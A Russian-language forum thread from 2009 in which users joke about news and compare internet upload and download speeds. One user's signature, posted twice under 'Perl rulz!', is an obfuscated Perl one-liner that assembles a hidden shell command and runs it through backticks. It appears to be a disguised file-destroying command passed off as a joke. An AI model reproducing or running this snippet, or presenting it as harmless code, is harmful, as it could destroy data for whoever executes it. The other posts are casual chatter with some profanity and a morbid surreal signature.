Я вот сейчас на голосование обратил внимание почему-то.Что-то не больно-то все и рады! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Вот это новость,ударился головой!В скором времени,вероятно,самыми хитовыми будут новости о том,что президент вдохнул,а потом...не поверите...выдохнул! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Мар 01, 2009 4:49 pm Заголовок сообщения:
сам хз, потому и запостил картинку _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!
Добавлено: Вс Мар 01, 2009 4:50 pm Заголовок сообщения:
ну скорость даунлоада правильная, но чтоб скорость аплоада у мя такая была, ппц, я в ахуе!! _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Добавлено: Вс Мар 01, 2009 5:04 pm Заголовок сообщения:
ИГОР
-_-
у некоторых провайдеров в этой вашей стране канал настолько широкий, что ап делают такой же как даун, хотя по правилам должен быть в 8 раз меньше
и да, мне нах не нужен такой большой даунлоад, я почти ниче не гружу, а вот ап бы мне пригодился заливать концерты и прочее =((( _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Мар 01, 2009 5:07 pm Заголовок сообщения:
ЫЫ, так я могу залить концертик)))))) _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Добавлено: Вс Мар 01, 2009 5:11 pm Заголовок сообщения:
все равно будет не так как мне хочется) концерты надо заливать правильно, и чтоб файлы назывались правильно и тд, и ваще, не только о концертах речь, и не только соад _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!